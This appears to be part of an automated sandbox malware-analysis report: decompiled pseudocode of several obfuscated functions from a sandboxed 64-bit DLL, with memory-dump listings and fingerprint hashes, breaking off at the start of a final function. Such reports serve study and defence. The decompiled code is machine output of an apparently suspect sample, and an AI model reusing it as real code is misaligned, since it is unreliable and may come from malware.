                                				_t46 = _t451 + 4; // 0x4
                                				if ( *((intOrPtr*)(_t464 + _t46 * 4)) - ( *(__r9 + _t456 * 4 * 2) & 0x0000ffff) <= 0) goto 0x130fb5f6;
                                				_t465 = _t449[0x2a];
                                				if (_t328 -  *((intOrPtr*)(_t437 + _t465 * 4)) <= 0) goto 0x130fb67f;
                                				 *0x13124194 =  *0x13124194 - 1;
                                				_t54 = _t445 + 0xd; // 0x3cf
                                				_t403 = _t54;
                                				 *(_t481 + _t403 * 4) =  *_t449;
                                				_t234 =  *0x13124150; // 0x0
                                				 *((intOrPtr*)(__r8 + _t403 * 8)) = _t234;
                                				_t235 =  *0x13124168; // 0x0
                                				asm("cdq");
                                				 *(__r9 + _t465 * 2) = _t235 / ( *(__r9 + _t465 * 2) & 0x0000ffff);
                                				_t285 =  *0x13124168; // 0x0
                                				_t286 = _t285 + 1;
                                				_t353 = _t286;
                                				 *0x13124168 = _t286 + 1;
                                				_t288 =  *0x13124120 & 0x0000ffff;
                                				 *0x13124198 = _t353;
                                				 *0x13124123 =  *0x13124123 | ( *(__r9 + 0x13ec) & 0x000000ff) + _t288;
                                				 *0x13124120 = _t288 + 1;
                                				_t404 =  *0x13124170; // 0x0
                                				_t405 = _t404 - 1;
                                				 *0x13124170 = _t405;
                                				 *(_t449[0xc]) = _t353 | _t456;
                                				goto 0x130fb98d;
                                				_t355 =  *0x131241a0; // 0x0
                                				_t242 =  *0x13124168; // 0x0
                                				_t407 = _t242 + 4;
                                				_t356 =  *0x13124140; // 0x0
                                				 *((intOrPtr*)(__r9 + _t355 * 2)) =  *((intOrPtr*)(__r9 + _t355 * 2)) + ( *(_t356 + _t407 * 4) & 0x0000ffff);
                                				_t357 =  *0x131241a8; // 0x0
                                				 *(_t357 + 0x3c2) =  *(_t357 + 0x3c2) ^ 0x00000080;
                                				 *0x131241a0 =  *0x131241a0 & _t407;
                                				 *0x13124148 = 0x158d % _t405 + 1;
                                				 *(_t481 + _t456 * 4) =  *(_t481 + _t456 * 4) ^ 0x00001de7;
                                				_t429 = _t456 * 4;
                                				 *(_t429 + _t429 + 0x35d9) =  *(_t429 + _t429 + 0x35d9) ^ ( *(__r8 + _t449[2] * 4) & 0x0000ffff) * 0x00000c36;
                                				r8d =  *0x13124124; // 0x0
                                				goto 0x130fb689;
                                				_t466 = _t449[6];
                                				_t99 = _t451 + 2; // 0x2
                                				r9d = r9d - 1;
                                				_t359 =  *((intOrPtr*)(_t437 + _t99 * 4));
                                				if ( *((intOrPtr*)(__rdx + _t456 * 8)) - _t359 <= 0) goto 0x130fb786;
                                				r14b = r14b + (( *0x4135 & 0x000000ff) * ( *0x13124123 & 0x000000ff) & 0x000000ff) * 0x63;
                                				_t410 = _t429 + _t429;
                                				_t250 =  *0x13124134; // 0x0
                                				 *(_t481 + _t410 * 4) =  *(_t481 + _t410 * 4) & _t250;
                                				 *(__rdx + _t410 * 8) =  *(__rdx + _t359 * 8) * 0x674;
                                				_t452 =  *0x13124150; // 0x0
                                				 *0x13124150 = _t452 +  *((intOrPtr*)(_t466 + 0x4b84));
                                				 *0x13124180 =  *(_t466 + 0x585c) & _t449[4];
                                				_t256 =  *(_t481 + _t456 * 4 * 4) & 0x0000ffff ^ r8w;
                                				 *0x13124190 =  *0x13124190 + _t256;
                                				_t257 = _t256 /  *0x13124194;
                                				_t414 =  *0x131241a8; // 0x0
                                				 *0x13124194 = _t257;
                                				 *(_t414 + _t449[0xe] + 4) =  *(_t414 + _t449[0xe] + 4) & _t257;
                                				 *((intOrPtr*)(_t481 + _t449[2] * 4)) =  *(_t481 + _t449[2] * 4) * ( *0x13124123 & 0x000000ff);
                                				goto 0x130fb78b;
                                				_t446 = _t328;
                                				_t449[0x32] = 0x52;
                                				_t472 =  *((intOrPtr*)(_t481 + (2 + ( *(__rdx +  *0x13124124 * 8) ^ r9d) * 2) * 4));
                                				_t394 = _t472;
                                				if (_t472 - _t446 < 0) goto 0x130fb899;
                                				r14b = r14b + 0xff;
                                				_t468 = __rdx + r9d * 8 + 8;
                                				_t262 =  *((__rdx + _t449[0x2a] * 8) * 4 + _t449[6]);
                                				asm("cdq");
                                				 *((_t394 << 4) + _t481 + 0x10 - 0x10) =  *((_t394 << 4) + _t481 + 0x10 - 0x10) & _t262 % r11d;
                                				_t369 =  *0x13124128; // 0x0
                                				 *0x13124133 =  *0x13124133 |  *(_t369 + 0x4134) & 0x000000ff;
                                				_t431 = r11d;
                                				r11d = r11d + 1;
                                				 *(_t449[0x10] + 0x5c + _t446 * 8) = _t262 / r11d /  *(_t449[0x10] + 0x5c + _t446 * 8);
                                				_t418 =  *0x131241a0; // 0x0
                                				_t419 = _t418 + _t418;
                                				_t374 = _t431 -  *(__rdx + _t419 * 8);
                                				 *(__rdx + _t419 * 8) = _t374;
                                				 *_t468 =  *_t468 & _t374;
                                				 *0x13124194 =  *0x13124194 + 1;
                                				r13d = 0xfb - r13d;
                                				 *_t468 =  *_t468 * _t431;
                                				if (_t394 + 1 - _t446 >= 0) goto 0x130fb7e0;
                                				_t443 = _t449[0x2c];
                                				_t377 =  *0x13124178; // 0x0
                                				 *(_t449[8] + _t377 * 4) =  *(_t377 + 0x2f1c) & 0x0000ffff;
                                				_t378 =  *0x131241a0; // 0x0
                                				 *0x13124194 = 0x8b9 %  *0x13124198;
                                				_t379 =  *0x131241a8; // 0x0
                                				 *((intOrPtr*)(_t443 + _t378 * 4 + 0x20)) = ( *(_t379 + 0x9ee) & 0x000000ff) -  *((intOrPtr*)(_t443 + _t378 * 4 + 0x20));
                                				 *((intOrPtr*)(_t443 + (_t449[1] + 1) * 4)) = 0x134 -  *((intOrPtr*)(_t443 + (_t449[1] + 1) * 4));
                                				 *((intOrPtr*)(_t449[0x2e] + _t449[0x2a] * 2)) = r13w;
                                				_t423 = _t476 * 4;
                                				_t433 =  *((intOrPtr*)(_t443 + _t423 * 4));
                                				if (_t433 != _t423) goto 0x130fb94e;
                                				 *((_t433 << 4) + 0xc + _t443) =  *((_t433 << 4) + 0xc + _t443) & _t449[0x32];
                                				if (_t433 + 1 == _t423) goto 0x130fb940;
                                				_t386 =  *0x13124188; // 0x0
                                				 *0x13124194 = 0xfffff211;
                                				_t387 =  *0x13124140; // 0x0
                                				 *0x13124123 =  *(_t386 + 0x1cd0) & 0x000000ff;
                                				_t388 =  *0x13124180; // 0x0
                                				 *0x13124180 = _t388 *  *(_t387 +  *_t449 * 4);
                                				_t281 =  *0x13124168; // 0x0
                                				return _t281;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9183cfed9594700024813088ad83315804a1e0c59a4b8eba35b8c92b38daba53
                                • Instruction ID: fe34e2276490208513ea4b68cc40a2090d0d41eb2fd55ab065a32a08e94d5209
                                • Opcode Fuzzy Hash: 9183cfed9594700024813088ad83315804a1e0c59a4b8eba35b8c92b38daba53
                                • Instruction Fuzzy Hash: 2E027F76A09EA986E714CF16E8806797BB4FB58759F214136DA8DA3324DF3CE120CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E00007FFC7FFC130F8D50(signed int __ebx, void* __ecx, signed int __edi, long long __rbx, signed int __rcx, void* __rdx, long long __rbp, void* __r8, void* __r9, signed int _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40) {
                                				signed int _t208;
                                				signed int _t214;
                                				signed int _t219;
                                				signed int _t221;
                                				signed int _t239;
                                				void* _t340;
                                				void* _t341;
                                				void* _t344;
                                				intOrPtr _t352;
                                				intOrPtr _t368;
                                				intOrPtr _t374;
                                				intOrPtr _t378;
                                				signed long long _t380;
                                				intOrPtr _t381;
                                				signed long long _t382;
                                				intOrPtr _t383;
                                				intOrPtr _t386;
                                				signed long long _t388;
                                				intOrPtr _t391;
                                				signed long long _t394;
                                				signed long long _t404;
                                				signed long long _t405;
                                				void* _t406;
                                				signed long long _t407;
                                				void* _t413;
                                				void* _t417;
                                				signed long long _t418;
                                				signed long long _t420;
                                				signed long long _t421;
                                				signed long long _t422;
                                				void* _t429;
                                				signed long long _t430;
                                				void* _t436;
                                				signed long long _t442;
                                				signed long long _t451;
                                				signed long long _t453;
                                				signed long long _t456;
                                				signed long long _t461;
                                				signed long long _t462;
                                				signed long long _t466;
                                				signed long long _t476;
                                				intOrPtr _t479;
                                				signed int* _t480;
                                				intOrPtr _t481;
                                				intOrPtr _t482;
                                				intOrPtr _t483;
                                
                                				_t436 = __r8;
                                				_t413 = __rdx;
                                				_a24 = __rbx;
                                				_a32 = __rbp;
                                				_t3 = _t413 - 1; // 0x38
                                				_t481 = _a40;
                                				_t5 = _t436 + 1; // 0x1
                                				_t429 = _t5;
                                				_t476 =  *0x131241a0; // 0x0
                                				r13d = 0x13f3;
                                				_a8 =  *0x1312416c & 0x0000ffff;
                                				r15d = __ebx & 0x0000ffff;
                                				r15w = r15w + r15w;
                                				_a16 = _t476 + __rcx;
                                				r11d =  *(__r9 +  *0x13124148 * 8);
                                				r11d = r11d - __ebx;
                                				if ( *((long long*)(_t481 + ( *_t480 +  *_t480) * 8)) - 0x1786 < 0) goto 0x130f8dd6;
                                				if (0x1d27 -  *0x13124194 - 0x13a3 > 0) goto 0x130f8f05;
                                				_t352 =  *0x13124138; // 0x0
                                				_t430 = _t429 + 1;
                                				if ( *((intOrPtr*)(_t352 + 0x80 + _t430 * 8)) - _t429 > 0) goto 0x130f8f05;
                                				if (_t352 != __rcx) goto 0x130f8f05;
                                				 *0x13124124 =  *0x13124124 + r8d;
                                				 *_t480 =  *_t480 - 1;
                                				_t208 =  *_t480 + 7;
                                				_t461 = _t208 +  *0x131241a8;
                                				 *_t461 = ( *_t461 & 0x000000ff) * ((_t208 % r11d & 0x000000ff) * 0x00000033 & 0x000000ff);
                                				 *0x131241a0 =  *0x13124148;
                                				 *(0x13f3 +  *_t480 * 4) =  *(0x13f3 +  *_t480 * 4) | 0x000005a1;
                                				_t214 =  *0x13124124; // 0x0
                                				_t417 = _t214 + 5;
                                				r9d =  *(_t417 + _t417 + 0x1c6a) & 0x0000ffff;
                                				_t340 = _t461 -  *0x13124180; // 0x0
                                				if (_t340 > 0) goto 0x130f8f05;
                                				asm("o16 nop [eax+eax]");
                                				r8d =  *0x13124133 & 0x000000ff;
                                				 *0x13124133 = 0x1625 % r8d;
                                				_t219 =  *( *0x1312414c +  *0x1312414c + 0x1c6a) & 0x0000ffff ^ r11d;
                                				asm("cdq");
                                				r9d = r9d + 1;
                                				 *((intOrPtr*)(0x13f3 + _t461 * 8 + 8 - 8)) =  *((intOrPtr*)(0x13f3 + _t461 * 8 + 8 - 8)) + _t219 % r9d;
                                				_t341 = r9d -  *0x13124180; // 0x0
                                				if (_t341 <= 0) goto 0x130f8ec0;
                                				_t462 =  *0x13124170; // 0x0
                                				_t221 = _t219 / r9d /  *(0x13f3 + _t462 * 4);
                                				 *(0x13f3 + _t462 * 4) = _t221;
                                				_t442 = __r9 +  *_t480 * 8;
                                				 *_t442 = _t417;
                                				_t368 =  *0x13124160; // 0x0
                                				r8d =  *(_t368 + 0x1e6a) & 0x000000ff;
                                				_t418 =  *0x13124194;
                                				r8d = r8d -  *0x13124148;
                                				 *0x13124148 = r8d;
                                				 *0x13124133 = ( *0x13124133 & 0x000000ff) * ((_t221 /  *_t442 / _t442 * ( *(_t481 + 0x4968) | _t418) % _t430 ^ 0x0000004d) & 0x000000ff);
                                				 *((long long*)(__r9 +  *_t480 * 8)) = 0x177c;
                                				r10d =  *(0x13f3 +  *_t480 * 4);
                                				_t374 =  *0x13124188; // 0x0
                                				if (r10d -  *((intOrPtr*)(_t374 + 0x35f0)) >= 0) goto 0x130f9075;
                                				r13d =  *0x13124134; // 0x0
                                				r11d =  *0x13124124; // 0x0
                                				_t482 =  *0x13124188; // 0x0
                                				 *0x1312414c = __ebx;
                                				asm("o16 nop [eax+eax]");
                                				r11d = r11d | r13d;
                                				 *0x13124124 = r11d;
                                				r15w = r15w + __ecx;
                                				r10d = r10d + 1;
                                				 *0x131241a0 = _t418;
                                				if (r10d -  *((intOrPtr*)(_t482 + 0x35f0)) < 0) goto 0x130f9020;
                                				_t483 = _a40;
                                				r13d = 0x13f3;
                                				_t479 = _a16;
                                				r8d = _a8;
                                				r8d = r8d + 1;
                                				_t420 = _t418 -  *(__r9 + __rcx * 8) + 0x1df2;
                                				 *(__r9 + __rcx * 8) = _t420;
                                				_t404 = __rcx + 1;
                                				_t378 =  *0x13124138; // 0x0
                                				r8d = r15w & 0xffffffff;
                                				asm("cdq");
                                				_t344 =  *0x13124134 -  *0x849b; // 0x0
                                				if (_t344 < 0) goto 0x130f9129;
                                				_t239 =  *0x13124148; // 0x0
                                				_t451 =  *0x13124180; // 0x0
                                				_t380 = _t420;
                                				_t421 =  *0x13124178; // 0x0
                                				 *((short*)(_t421 + (_t3 + 1 - 1 + 1) * 2)) = (_t239 + _t239) / (_t451 - __rcx * (_t3 + 1 - 1)) / _t430;
                                				_t422 = _t421 ^ _t380;
                                				 *(_t479 + _t380 * 8) = _t422;
                                				goto 0x130f919e;
                                				_t381 =  *0x13124128; // 0x0
                                				if ( *((intOrPtr*)(_t381 + _t404 * 8)) == 0x1853) goto 0x130f92df;
                                				_t453 =  *_t480;
                                				_t382 =  *0x1312414c;
                                				if ( *((intOrPtr*)(__r9 + _t453 * 8)) == _t382) goto 0x130f92df;
                                				_t146 = _t453 + 1; // 0x1002
                                				 *_t480 = _t146;
                                				 *(_t483 + _t382 * 8) = _t422;
                                				_t383 =  *0x13124138; // 0x0
                                				 *((long long*)(_t383 + ( *_t480 + 0x14) * 8)) = _t383 -  *((intOrPtr*)(_t479 + _t404 * 8)) -  *((intOrPtr*)(_t383 + ( *_t480 + 0x14) * 8));
                                				_t405 = _t404 + 1;
                                				_t386 =  *0x13124178; // 0x0
                                				r10d = ( *(_t378 + 0x7c28) * __ebx | __edi) * r8d % r8d + 0x00000001 & 0x0000ffff;
                                				if (r10d - ( *(_t386 + 0x3088) & 0x0000ffff) <= 0) goto 0x130f929d;
                                				_t406 = _t405 + 1;
                                				_t466 = r10d;
                                				_t388 = _t406 -  *0x13124180;
                                				 *0x13124180 = _t388;
                                				 *0x13124123 = (r10b & 0xffffffff) - (((0x891ac73b * r10d >> 0x00000020) + r10d >> 0x0000000a) + ((0x891ac73b * r10d >> 0x00000020) + r10d >> 0x0000000a >> 0x0000001f) & 0x000000ff) * 0x00000078 | r10b;
                                				 *(_t479 + _t388 * 8) =  *(__r9 + _t466 * 8) + 0x00000eba ^ _t466;
                                				_t456 =  *_t480;
                                				if ( *((intOrPtr*)(__r9 + _t456 * 8)) - _t388 < 0) goto 0x130f9246;
                                				 *(__r9 + _t466 * 8) = _t466;
                                				 *0x13124123 =  *0x13124123 |  *0x13124130 & 0x000000ff;
                                				goto 0x130f9283;
                                				_t174 = _t456 + 1; // 0x1002
                                				_t407 = _t406 - 1;
                                				 *_t480 = _t174;
                                				 *((_t405 << 5) + _t483 + 0x20) =  *((_t405 << 5) + _t483 + 0x20) &  *(_t483 + _t388 * 8);
                                				 *0x13124148 = _t388 %  *0x13124148;
                                				 *((long long*)(__r9 +  *_t480 * 8)) = _t466 -  *((intOrPtr*)(_t483 + _t407 * 8)) -  *((intOrPtr*)(__r9 +  *_t480 * 8));
                                				_t391 =  *0x13124178; // 0x0
                                				r10d = r10d + 1;
                                				if (r10d - ( *(_t391 + 0x3088) & 0x0000ffff) > 0) goto 0x130f91c3;
                                				_t394 = ( *0x13124194 | _t430) - 0x176d;
                                				 *(_t483 + 8 + _t407 * 8) =  *(_t483 + 8 + _t407 * 8) ^ _t394;
                                				 *((long long*)(__r9 + _t394 * 8)) = ( *(__r9 +  *0x1312414c * 8) ^ _t430) +  *0x1312414c -  *((intOrPtr*)(__r9 + _t394 * 8)) + 0xa8b;
                                				return __ebx;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fe9a542d13f22d74058ef6739bbca4133ff2f70eff9c3a9ebad88dc985c74bd6
                                • Instruction ID: 1f179a8c17ef80c191ec74cca7e5a897f172d741ebe04c54119db0aee295e257
                                • Opcode Fuzzy Hash: fe9a542d13f22d74058ef6739bbca4133ff2f70eff9c3a9ebad88dc985c74bd6
                                • Instruction Fuzzy Hash: 6BE1C772A14EAD86F710CF16E8405A57BB5FB58799F268032DA4C63360DF3CE521C714
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 98%
                                			E00007FFC7FFC130E1520(intOrPtr __eax, long long __rbx, signed int __rdx, void* __r8, void* __r9, long long _a8, intOrPtr _a16, signed int _a24, signed long long _a32, signed long long _a40, signed int _a48, signed long long _a56, intOrPtr _a72, intOrPtr _a80) {
                                				signed int _t220;
                                				signed int _t222;
                                				signed char _t248;
                                				signed char _t268;
                                				intOrPtr _t296;
                                				signed long long _t298;
                                				intOrPtr _t300;
                                				signed long long _t302;
                                				signed long long _t304;
                                				signed long long _t307;
                                				intOrPtr _t309;
                                				intOrPtr _t310;
                                				intOrPtr _t313;
                                				signed long long _t316;
                                				signed long long _t317;
                                				signed long long _t319;
                                				intOrPtr _t321;
                                				signed long long _t322;
                                				intOrPtr _t323;
                                				signed long long _t324;
                                				signed long long _t328;
                                				signed long long _t330;
                                				signed long long _t333;
                                				intOrPtr _t334;
                                				signed long long _t341;
                                				signed long long _t345;
                                				intOrPtr _t350;
                                				intOrPtr _t353;
                                				signed long long _t354;
                                				signed long long _t359;
                                				intOrPtr* _t363;
                                				unsigned long long _t365;
                                				signed int _t368;
                                				long long _t370;
                                				signed long long _t373;
                                				signed long long _t379;
                                				signed long long _t381;
                                				void* _t382;
                                				signed long long _t383;
                                				signed long long _t384;
                                				signed long long _t389;
                                				signed long long _t390;
                                				intOrPtr _t393;
                                				intOrPtr* _t394;
                                
                                				_a8 = __rbx;
                                				 *0x13124168 =  *0x13124168 + 1;
                                				_t383 =  *0x131241a0; // 0x0
                                				_t368 =  *0x13124124;
                                				_t333 = _a56;
                                				_t384 = _t383 + 1;
                                				_t394 = _a48;
                                				_t393 = _a80;
                                				_a16 = __eax;
                                				_a24 =  *0x13124130 & 0x0000ffff;
                                				_t296 =  *0x13124138; // 0x0
                                				 *0x131241a0 = _t384;
                                				 *0x13124194 =  *0x13124194 + 1;
                                				_t359 =  *(_t394 + 0x7f50) |  *0x13124180;
                                				_t298 =  *(_t296 + 0xc410) ^ 0x000016b3;
                                				_a32 = _t298;
                                				_a48 =  *(_t333 + 0x1505) & 0x000000ff;
                                				 *0x13124198 = _t298;
                                				 *(_t393 + _t384 * 8) = __rdx * 0x12f6;
                                				_t379 =  *0x131241a0; // 0x0
                                				_t370 =  *0x13124158; // 0x0
                                				_t300 =  *0x13124188; // 0x0
                                				r10d =  *0x13124132 & 0x000000ff;
                                				 *0x131241a0 = _t379 - 1;
                                				 *0x13124190 =  *0x13124190 & 0x0000ffff &  *(_t300 + _t384 * 4);
                                				 *0x13124158 = _t370 - 1;
                                				_t302 =  *0x13124140; // 0x0
                                				 *0x131241a0 = _t359;
                                				_t381 = _t359;
                                				_t334 = _a72;
                                				if (( *(_t333 + 0xeac) & 0x000000ff) -  *((intOrPtr*)(_t302 + 0x7864)) <= 0) goto 0x130e16b5;
                                				 *(__r8 +  *0x13124148 * 8) =  *(__r8 +  *0x13124148 * 8) ^ ( *0x13124148 - 0x00000ef1 | _t302);
                                				_t304 =  *0x131241a0; // 0x0
                                				 *0x13124132 = ( *0x13124132 & 0x000000ff) * (( *(_t368 +  *0x13124148 * 8) & 0x000000ff) +  *((intOrPtr*)(__r9 + 0x3e10)) & 0x000000ff);
                                				 *(__r8 + (_t304 + _t304) * 8) =  *(__r8 + (_t304 + _t304) * 8) ^ 0x00000001;
                                				goto 0x130e180e;
                                				if (0xc20 % _a48 - 0x10cd > 0) goto 0x130e175a;
                                				r12d = 0xffff;
                                				 *((intOrPtr*)(_t334 +  *0x13124148 * 2)) =  *((intOrPtr*)(_t334 +  *0x13124148 * 2)) + ( *(_t368 + _t381 * 4) & 0x0000ffff) +  *0x13124150 - 0x2cf;
                                				 *0x13124150 =  *0x13124150 - 1;
                                				_t341 =  *0x131241a0; // 0x0
                                				 *0x1312416c = 0x141c;
                                				 *0x13124130 = ( *0x13124130 & 0x0000ffff) + r12w;
                                				_t307 =  *0x13124128; // 0x0
                                				 *((short*)(0x646 + _t341 * 4)) = _t307 / (_t341 + _t341);
                                				goto 0x130e1819;
                                				_t309 =  *0x13124178; // 0x0
                                				_t373 =  *0x13124198; // 0x0
                                				if (( *0x13124132 & 0x000000ff) ==  *((intOrPtr*)(_t309 + __rdx * 2))) goto 0x130e1784;
                                				if (_t309 == _t373) goto 0x130e17a3;
                                				_t310 =  *0x13124138; // 0x0
                                				if ( *((intOrPtr*)(_t394 +  *0x13124148 * 8)) ==  *((intOrPtr*)(_t310 + 0xea38))) goto 0x130e1ac0;
                                				 *(__r9 + _t384 * 8) =  *0x13124124 *  *0x13124180;
                                				_t363 =  *0x13124124 +  *0x13124160;
                                				 *_t363 = (sil & 0xffffffff) * 0x3d -  *_t363;
                                				_t313 =  *0x13124140; // 0x0
                                				 *((intOrPtr*)(_t313 +  *0x13124124 * 4)) = 0x7ff;
                                				 *(_t393 + __rdx * 8) =  *(_t393 + __rdx * 8) *  *(_t393 + 0x4858);
                                				_t389 = __rdx + 1;
                                				 *(_t334 + 0x14 + _t389 * 4) =  *(_t334 + 0x14 + _t389 * 4) &  *0x13124122 & 0x000000ff;
                                				r12d = 0xffff;
                                				 *0x13124148 =  *0x13124148 + 1;
                                				_t390 = _t389 + 1;
                                				_t316 = _a40;
                                				r8d = 0x79f;
                                				 *0x13124132 =  *(_t316 + _t390 * 4) - (((0x939fd7a3 *  *(_t316 + _t390 * 4) >> 0x20) +  *(_t316 + _t390 * 4) >> 0xc) + ((0x939fd7a3 *  *(_t316 + _t390 * 4) >> 0x20) +  *(_t316 + _t390 * 4) >> 0xc >> 0x1f)) * 0x1bbf;
                                				_t345 = _t394 + _t316 * 8;
                                				 *_t345 = _t363;
                                				_t317 =  *0x131241a8; // 0x0
                                				r15d = 0x7a3;
                                				_t365 =  *(_t394 + _t390 * 8) & _t345;
                                				 *(0x3d4 + _t317 * 8) = _t365;
                                				_t268 =  *(_t317 + _t317 + 0x63a) & 0x0000ffff;
                                				if (_t268 - 0x155e >= 0) goto 0x130e193a;
                                				r9d = _t268;
                                				asm("o16 nop [eax+eax]");
                                				_t319 =  *0x131241a0; // 0x0
                                				_t382 = _t381 + 1;
                                				 *((intOrPtr*)(_t393 + (_t365 + 0x20) * 8 + 8 - 8)) =  *((intOrPtr*)(_t393 + (_t365 + 0x20) * 8 + 8 - 8)) + (_t319 | _t381);
                                				_t321 =  *0x131241a8; // 0x0
                                				 *((char*)( *_t394 + _t321)) = 0x28;
                                				 *0x13124132 = ( *0x13124132 & 0x000000ff) * 0x73;
                                				_t248 = ( *0x1312416c & 0x0000ffff) + r12w;
                                				 *0x1312416c = _t248;
                                				 *0x13124133 =  *0x13124133 + ( *(_a32 + _t365 * 4 + 4 - 4) & 0x000000ff | _t268 | _t248);
                                				if (_t268 + 1 - 0x155e < 0) goto 0x130e18d0;
                                				_t322 =  *0x13124170; // 0x0
                                				 *0x13124150 =  *0x13124150 | _t322;
                                				 *(__r8 + 8 + (_t390 + _t390) * 8) =  *(__r8 + 8 + (_t390 + _t390) * 8) | _t322;
                                				r9d =  *0x13124148; // 0x0
                                				_t323 =  *0x13124178; // 0x0
                                				r8d =  *(_t323 + (_t382 + _t382) * 2) & 0x0000ffff;
                                				_t220 =  *0x13124124; // 0x0
                                				r8d = r8d ^ 0x00000877;
                                				_t350 =  *0x131241a8; // 0x0
                                				r8d = r8d + _t220 + 0xfffff332;
                                				 *0x13124124 = r8d;
                                				_t222 =  *(_t350 + 0xe81) & 0x000000ff;
                                				if (r10d - _t222 > 0) goto 0x130e19af;
                                				if (_a16 - 0xc3e <= 0) goto 0x130e1a20;
                                				_t324 =  *0x131241a0; // 0x0
                                				 *0x131241a0 = _t324 + 1;
                                				 *0x13124148 = _t222 /  *0x4794 * _t365 %  *0x1312414c - r9d;
                                				 *((intOrPtr*)(__r8 + (_t365 - (_t365 >> 7) * 0xbad) * 8)) =  *((intOrPtr*)(__r8 + (_t365 - (_t365 >> 7) * 0xbad) * 8)) + _t365 - (_t365 >> 7) * 0xbad;
                                				r8d =  *0x13124124; // 0x0
                                				_t353 =  *0x131241a8; // 0x0
                                				_t328 =  *0x131241a0; // 0x0
                                				r9d =  *0x13124132 & 0x000000ff;
                                				_t354 = _a56;
                                				 *0x131241a0 = _t328 - 1;
                                				if (( *(_t382 + _t353) & 0x000000ff) != ( *(_t354 + _t328 * 4) & 0x000000ff)) goto 0x130e1a96;
                                				r8d = r8d + 1;
                                				 *0x13124124 = r8d;
                                				_t330 =  *_t394;
                                				 *(__r8 + _t330 * 8) = _t354 ^ 0x00000045;
                                				 *0x131241a0 =  *0x131241a0 +  *((intOrPtr*)(0x1089 + _t330 * 4));
                                				return  *0x13124132 & 0x000000ff;
                                 			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca6b1c4497fa61e7931f76e937ad3dd685b13b9db48d4da50510d773187c50da
                                • Instruction ID: 7e00520255034525651c8ecc9ef81e0591c1366a189bc2f06ca13c99c8385b6a
                                • Opcode Fuzzy Hash: ca6b1c4497fa61e7931f76e937ad3dd685b13b9db48d4da50510d773187c50da
                                • Instruction Fuzzy Hash: 2FF18E72A48EA985F704CB16E8905753BB5FB68769F254132DA8DA3360DF3CF061CB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 96%
                                			E00007FFC7FFC130E42A0(intOrPtr __ecx, long long __rbx, signed int __rdx, signed int __r9) {
                                				signed char _t181;
                                				signed int _t193;
                                				intOrPtr _t196;
                                				signed int _t202;
                                				signed int _t208;
                                				signed int _t219;
                                				signed int _t248;
                                				signed char _t253;
                                				signed int _t255;
                                				signed int _t266;
                                				signed long long _t272;
                                				intOrPtr _t299;
                                				signed long long _t300;
                                				signed long long _t303;
                                				signed long long _t304;
                                				signed long long _t305;
                                				signed long long _t306;
                                				signed long long _t308;
                                				signed long long _t309;
                                				intOrPtr _t312;
                                				signed long long _t313;
                                				intOrPtr _t314;
                                				signed long long _t318;
                                				signed long long _t320;
                                				signed long long _t321;
                                				signed long long _t322;
                                				intOrPtr _t324;
                                				void* _t331;
                                				signed long long _t347;
                                				signed long long _t348;
                                				signed long long _t355;
                                				signed long long _t356;
                                				signed long long _t357;
                                				void* _t361;
                                				signed long long* _t362;
                                				signed short* _t364;
                                				signed long long _t367;
                                				intOrPtr _t371;
                                				signed long long _t372;
                                				signed long long _t377;
                                				signed long long _t378;
                                				signed long long _t379;
                                				signed short* _t381;
                                				signed long long _t385;
                                				signed long long _t387;
                                				signed long long _t392;
                                				void* _t396;
                                				signed int* _t399;
                                				signed int* _t401;
                                
                                				 *((long long*)(_t361 + 0x18)) = __rbx;
                                				 *(_t361 + 0x20) = r9d;
